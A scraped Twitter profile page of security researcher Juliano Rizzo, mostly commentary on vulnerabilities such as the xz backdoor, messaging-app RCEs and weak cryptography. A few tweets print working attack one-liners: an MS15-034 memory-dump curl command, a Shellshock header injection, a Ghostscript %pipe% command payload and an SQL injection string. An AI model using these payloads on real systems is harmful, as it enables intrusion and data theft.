Juliano Rizzo
@julianor
Followers
9,638
Following
1,947
Media
396
Statuses
15,333
Explore trending content on Musk Viewer
Taylor
• 755466 Tweets
Leverkusen
• 405725 Tweets
hailey
• 269080 Tweets
TTPD
• 168887 Tweets
Whindersson
• 163101 Tweets
Selena
• 79234 Tweets
Celtics
• 66705 Tweets
Xabi Alonso
• 65370 Tweets
Maranhão
• 60755 Tweets
メイドの日
• 60538 Tweets
#虎に翼
• 54284 Tweets
Eddie
• 43008 Tweets
Garland
• 30924 Tweets
Endrick
• 29299 Tweets
Cavs
• 28081 Tweets
Tatum
• 26597 Tweets
メイド服
• 23837 Tweets
ドラマ化
• 21988 Tweets
Palacios
• 21310 Tweets
Cano
• 18321 Tweets
Cleveland
• 16911 Tweets
Galactus
• 15659 Tweets
PRISCILLA
• 15620 Tweets
#911onABC
• 15363 Tweets
San Lorenzo
• 14744 Tweets
Veiga
• 13401 Tweets
Canes
• 13176 Tweets
Jia Tan's git commit to turn off Landlock sandboxing one week after Lasse Collin improved it. I understand the sandbox is for xz, the command line tool, and Jia did not need to disable it for the SSHD backdoor. 🤔The xz command also activates the backdoor?
11
166
1K
CVE-2020-27020 "every instance of Kaspersky Password Manager in the world will generate the exact same password at a given second"
Reported 2 years ago "June 15, 2019: report and proof of concept sent to through HackerOne."
23
304
1K
xz/lzma backdoor:
🔬 Discovered and analyzed by Andres Freund while investigating performance issues
🔎 GitHub "JiaT75" contributions now being audited
🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable
☠️ Narrowly avoided wider impact
The xz/liblzma CVE-2024-3094 backdoor is door with a key:
🕵️Obfuscated code hidden in test data files
🎯Injects code during Debian or RPM package build process
🔐Redirects crypto functions used during SSH logins
👻 Tries to evade analysis & debugging
🔎Detected by Andres Freund
5
72
308
9
184
561
Jia Tan's XZ attack was steps away from owning millions of devices. Buildroot uses & recommends XZ for images & upstream package code. Switching the XZ_SITE var to the "xz." subdomain in this config could've been enough but In this patch it is accepted only for documentation.
2
74
404
Github auth bypass $25,000 bounty: CSRF with HEAD
4
146
385
Reverse engineering by
@amlweems
reveals 3 flaws that allows attackers to use the backdoor without the private key, using only a captured message signed for the target host:
1. Lack of replay protection
2. Symmetric encryption with a hardcoded key,
3. Partially signed commands
I've been reverse engineering the xz backdoor this weekend and have documented the payload format and written a proof-of-concept exploit for the RCE. The payloads are signed with an ED448 key, so I patched my own key into the backdoor for testing. :-)
54
915
4K
6
105
389
infosec Twitter excited about yet another Linux priv escalation bug 🥱(who cares, unix priv separation 50 years of fail) but no comments about the WhatsApp RCE without any boomer memory corruption technique being used? Thread
4
80
314
The xz/liblzma CVE-2024-3094 backdoor is door with a key:
🕵️Obfuscated code hidden in test data files
🎯Injects code during Debian or RPM package build process
🔐Redirects crypto functions used during SSH logins
👻 Tries to evade analysis & debugging
🔎Detected by Andres Freund
5
72
308
"The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9."
GHSL-2021-1012: Poor random number generation in keypair - CVE-2021-41117 -
3
38
145
9
75
269
The end is near. 2020 does not forgive. "15 years later: Remote Code Execution in qmail (CVE-2005-1513)"
2
98
234
CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
1
28
71
2
108
210
Tried to investigate the Solana wallet key theft issue but are all the wallets closed source? Seriously?
11
19
141
The barrier to remote code execution in a *secure* chat app is of this regex that looks like x86 shellcode? 😕const URL_REGEX = /(^|[\s\n]|<br\/?>)((?:https?|ftp):\/\/[-A-Z0-9\u00A0-\uD7FF\uE000-\uFDCF\uFDF0-\uFFFD+\u0026\u2019@#/%?=()~_|!:,.;]*[-A-Z0-9+\u0026@#/%=~()_|])/gi;
5
62
125
"100% reliable and portable exploit for MobileSafari on IOS7.1.x. can be downloaded from github" CVE-2014-4377
#ios8
http://t.co/dGWm5V7h4L
5
138
115
The Volkswagen attack but for apps!
"For example, an app could determine whether it was in Apple's review process, changing its UI so as not to fall foul of any App Store guidelines before unleashing popups asking for money on unsuspecting users. "
👀 “An investigation into seven different apps on the Mac App Store, including the number one PDF reader in the U.S., has found that all of them are orchestrated by the same Chinese developer using fake reviews and command-and-control exploits to try and target users.”
3
67
157
3
54
118
"Radiofrequency radiation exposure from the iPhone 7 — one of the most popular smartphones ever sold — measured over the legal safety limit and more than double what Apple reported to federal regulators from its own testing" 🍎📱☠️
4
61
104
🤔🤥
The analysis Andres Freund did was without reading the source code, observing the system using tools like perf and gdb that do not require source code.
🗨️From his email:
"most of what I observed is purely from observation."
2/ Open source worked the way it's supposed to. Some hacker noticed something that made him curious, poked at it because hackers are like that, and because the code was open and availablwe for inpection, diagnosed the problem before any serious harm was done.
7
99
1K
2
13
86
SSL/TLS Triple Handshake Attack Demo client cert authentication broken. Web exploit.
http://t.co/OHxx0u9XCi
4
91
80
🤦♂️😳😥 Programmer was spied, raided, computer devices taken to examine personal files. Reasons provided by police "investigation" about an email leak? tweets about Java, Python, nginx, electronic voting systems, and being critic about the security of gov systems. Argentina.
Y hablando de cuestiones técnicas, parece que la
@PFAOficial
hasta hizo un diagrama con mis supuestas habilidaded. (Aclaro: no programo en java ni que me corten un brazo).
28
54
251
0
43
81
⚠️ don't use java.util.Random to generate cryptocurrency private keys.
5
44
81
Jared Allard, 1Password employee, GitHub's account made a PR to update a dependency to the backdored version:
xz/lzma backdoor:
🔬 Discovered and analyzed by Andres Freund while investigating performance issues
🔎 GitHub "JiaT75" contributions now being audited
🐧Affected distros: Debian sid, Fedora 41/Rawhide, Arch Linux (5.6.1-1), NixOS unstable
☠️ Narrowly avoided wider impact
9
184
561
3
11
77
"With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits"
1
33
76
Another Jenkins unauthenticated remote code execution serialization exploit. supply chain attacks 😱🚨
1
73
74
not a backdoor! but.. this is how electron apps update ? (found while reviewing something else)
5
15
73
@julitolopez
Recuerdo de chico ver una noticia sobre un pueblo y que la explicación era pesticida:
7
14
71
🔥CVE-2023-38408: "Surprisingly, by chaining 4 common side effects of shared libs from official distribution packages, we were able to transform this very limited primitive (dlopen and dlclose of shared libraries from /usr/lib*) into a reliable, one-shot remote code execution"
1
28
71
Chromecast starts an open WiFi AP if it gets disconnected from your AP, and it has the key of your WiFi network and at least 3 TCP services
5
45
66
\o WhatsApp stores SSL/TLS secrets and some useful info for attackers in /sdcard. Bad. Attackers can get the secrets from JS code in a HTML attachment and use them to hijack connections between WhatsApp and servers. Bad but ehhh2eeehh encryption ...
1
17
65
Second public Auth0 JWT critical bug IIRC "JWT Validation Bypass in Auth0 Authentication API" "does not adequately validate a user’s JWT token, allowing an attacker to forge a JWT for any user by creating a JWT with an algorithm of ‘none’ " JWT->🗑️
3
29
63
I was asked what improved in the last 20 years, I said "at least we don't have RCE in Apache"
2
3
62
"The code can't be 'hacked.' It can only be used" You don't break software when you exploit it, you just demonstrate that it was broken.
1
58
59
TCP/IP in recent (2012) Linux kernels is broken. Off-path hijacking: JavaScript injection, Tor de-anonymization.
0
42
59
1/ 🧵Recently, I've come across rumors about security issues at
#Cloudflare
, and it's really worrisome. High-impact attacks have been reported, somehow abusing their API. I can't believe this has been circulating for so long without any clarification.
4
25
62
"Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers."
2
9
61
Por cierto, asi como trabajamos gratis para ilustrar riesgo de voto informático, contribuiriamos a un proyecto serio de tecnología electoral
1
27
59
'or'1'='1 but without quotes.
0
28
55
SSL/TLS Checklist for Pentesters -Manual Configuration Tests Cheatsheet
http://t.co/RA7jPFfUL2
0
52
57
"For ECDSA signatures, the nonce K becomes significantly biased with up to 80 of the 256 bits being static, resulting in weakened signatures. This could allow an attacker who gains access to several signatures to reconstruct the private key."🤔
Yubico has discovered and fixed an issue with our YubiKey FIPS Series keys, see the following Advisory for technical details and information on how to obtain a free replacement device. No other YubiKey, Security Key or Yubico products are affected.
4
120
130
0
42
57
"Unfortunately, OpenPGP has a few spots where SHA-1 is hardwired into
the design. For example, key fingerprints cannot be anything else"
2
80
54
Attacks on the software supply chain are "the attack", anything can be hacked this way. Malicious npm packages are one of the easiest. The recently detected attacks are loud - cryptocurrency mining CPU usage or broken builds. The most subtle and targeted not being detected.
1
20
53
🎻 Spoiler: new post-quantum (🤌) code is packed with bugs that turn your private conversations into an open book for memory corruption exploit artists.
🪄But fear not, you're protected against adversaries wielding imaginary computers.
So Apple has gone and updated the iMessage protocol to incorporate both forward security (very good!) and post-quantum cryptography.
26
369
1K
4
13
54
" I realized that this bug was first reported to Microsoft in 1997, making it older than I am. "😏
1
45
49
Exploiting Linux Kernel futex CVE-2021-3347 CVE-2014-3153
1
20
53
MS15-034 x=$[$(curl -sk $URLFILE -w"%{size_download}" -oo)-1];curl -sk $URLFILE -H"Range: bytes=$x-18446744073709551615" -o dmp;od -x dmp
1
55
52
infosec job security "Passing a number as the first argument to Buffer() (e.g. new Buffer(10)) allocates a new Buffer object of the specified size. Prior to Node.js 8.0.0, the memory allocated for such Buffer instances is not initialized and can contain sensitive data."
2
24
50
SIM swap en Argentina es demasiado fácil. Por ejemplo, en un local de la empresa pedís cambiar de Micro a Nano y no verifican identidad como deberían. No uses SMS como segundo factor para nada importante.
3
19
52
Google Wave failed but the demo was interesting, exciting, interesting problems solved, ambitious. Recent product demos are so lame.
2
10
48
If Windows Electron app uses electron-builder autoupdate, it downloads .yml file from url set in package.json. The download temp file name includes a string from the .yml file (url decoded) and is passed to Powershell unescaped. RCE from update server bypassing sig verification.
3
25
50
"Use Signal " the twitter security expert said. 2 wormeable remote code execution bugs in less than a week.
New variant of our vulnerability found in signal-deskop, already patched in v1.11.0
Here's the write-up w/ messages exfiltration PoC:
And the advisory:
Found by
@IAmMandatory
cc
@ortegaalfredo
@julianor
#CVE
-2018-11101
1
63
63
7
29
45
Internal Server Error (500) or empty reply means vulnerable: curl -H"test:() { test; }; /usr/bin/yes" server CVE-2014-6271:
0
45
46
impressive exploit for nginx<=1.4.0 CVE-2013-2028 by sorbo
http://t.co/8qWNYF2T1z
64bit,finds canary byte by byte,blind rop, tcp frag,8-o ..
0
48
48
#BoletaUnicaPapelYa
No poner computadoras donde no hacen falta. Todavía no podemos ni lograr que estas hagan sólo lo que el dueño quiera.
2
40
45
@dystopiabreaker
I suspect it is hallucinated but it should be easy to trigger it with a fame moon if that is the case
1
0
47
The agile scam: it solves everything if 'properly implemented'
This is a misconception. Properly implemented, agile methods dramatically reduce security risk. See my direct replies for more, but the summary is, policies are best implemented as software, not as documents everyone ignores.
0
1
3
7
13
48
'I was an idiot and assumed that the "random" button on
http://t.co/5BG14kGfwU
was truly random" $20k life lesson
http://t.co/Q4nU2XSWMI
8
64
46
Every React project using "dangerouslySetInnerHTML" I have reviewed was exploitable.
Yes! "dangerously" is the name
Yes! devs use it anyway for security apps (encrypted chat, wallets)
commit "Move to react for newlines, emoji, and links in message body"
2
20
46
A computational algebra system in Smalltalk by a bored hacker
1
26
44
EASTER attack: Even More Critical Bugs in SSL/TLS impl.(Java)
http://t.co/DXOifYTIjX
"only about 73710 queries in mean for a 4096 RSA"
3
93
44
Current Internet threat level after
#ShadowBrokers
dump + Linux UDP RCE
#internetthreatlevel
HIGH RISK
3
37
39
"it is astounding that no one who wrote the MCAS software for the 737 Max seems even to have raised the possibility of using multiple inputs, including the opposite angle-of-attack sensor, in the computer’s determination of an impending stall. .."
0
27
40
don't be surprised if SSRF + will be used in a few remote root exploits next year. + cool crypto bug? perhaps
1
29
39
Exploiting Android S-Boot 👍Read it if you want to know how Android boots and can be attacked from USB
1
35
39
reprogram 4G modems via SMS, make them act as keyboard -> reboot -> act as storage -> install bootkit. 8-o
http://t.co/mcnj0WOLHU
3
69
39
RIP Condor. When I was ~11 years old I collected newspaper clippings about hacking (no Internet yet 👴) and many were about his story (at least a version of it). Around 2002 he emailed me asking for sendmail exploit (
@lcamtuf
bug) Treasured mail, printed and saved but lost now.
We've lost a true pioneer of the digital world, Kevin Mitnick. His ingenuity challenged systems, incited dialogues, and pushed boundaries in cybersecurity. He will remain a testament to the uncharted power of curiosity.
#RIPKevinMitnick
80
861
3K
1
7
39
Hackers having fun with .ar electronic voting system. Cool demo today at Congress (if gov.ar doesn't find a way to cancel or delay it again)
0
28
37
Learn and save the world: The Layman's Guide to IC Reverse Engineering
http://t.co/7SS0d1pJra
0
19
35
1/🧵 It's crucial to understand how Cloudflare Worker-based MITM attacks can impact dApps, web wallets, and other services. Let's dive into the mechanics of these attacks, and what you should know to protect yourself:
1
12
35
MS015-034 a new Heartbleed? try: Range: bytes:(filesize-1)-18446744073709551615 I get extra bytes
1
54
37
Ledger Recover controversy: I asked if after the update the seed leaves the most secure part of the SE:
btchip: "Official statements will be available on our twitter account. This firmware update introduces a new API to return the seed shards to the Dashboard, correct" 🧵
2
6
33
If you're developing a crypto wallet app, it's especially important to be cautious about using third-party libraries in production. Telemetry, crash reporting, and other libs can be useful tools for app developers, but they also come with some risks beyond privacy issues. 1/6
4
14
34
0day exploit prices: * AV remote, Office/PDF reader: $50k * Chrome: $150k
3
28
35
😱
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
2
17
35
"It is worth noting that even though the project was coded in Rust, the audit team found vulnerabilities that resulted in remote code execution and memory corruption." 🎤
Results from Grin's 2nd security audit are now published. A big thanks to
@coinspect
, j01tz, and all the 💛Grin donors💛 who made this work possible. ツ
16
8
46
2
12
36
free crypto course with certificate: Cryptography from
@UofMaryland
on
@Coursera
!
#cryptography
(Sep 15th 8 weeks)
3
22
36
James Iry’s history of programming languages (illustrated with pictures and large fonts)
http://t.co/KTzEmgj4SU
http://t.co/0Vp11pLawb
0
38
35
some believed cryptocurrency incentives were going to make p2p networks like Tor better: "They replaced bitcoin addresses in HTTP traffic to redirect transactions to their wallets instead of the user provided bitcoin address"
wow, an attacker recently controlled up to 24% the exit relay capacity of the tor network, seemingly all for a cryptocurrency scam. this is crazy >
0
32
46
2
19
33
../ To make this RCE chains easier WhatsApps stores native libraries in /data/data/com.whatsapp/files/decompressed/libs.spk.zst 🤷♂️attackers can use the .zip bug to overwrite any of them (I would go for the Rust ones) and execute arbitrary code.
2
5
33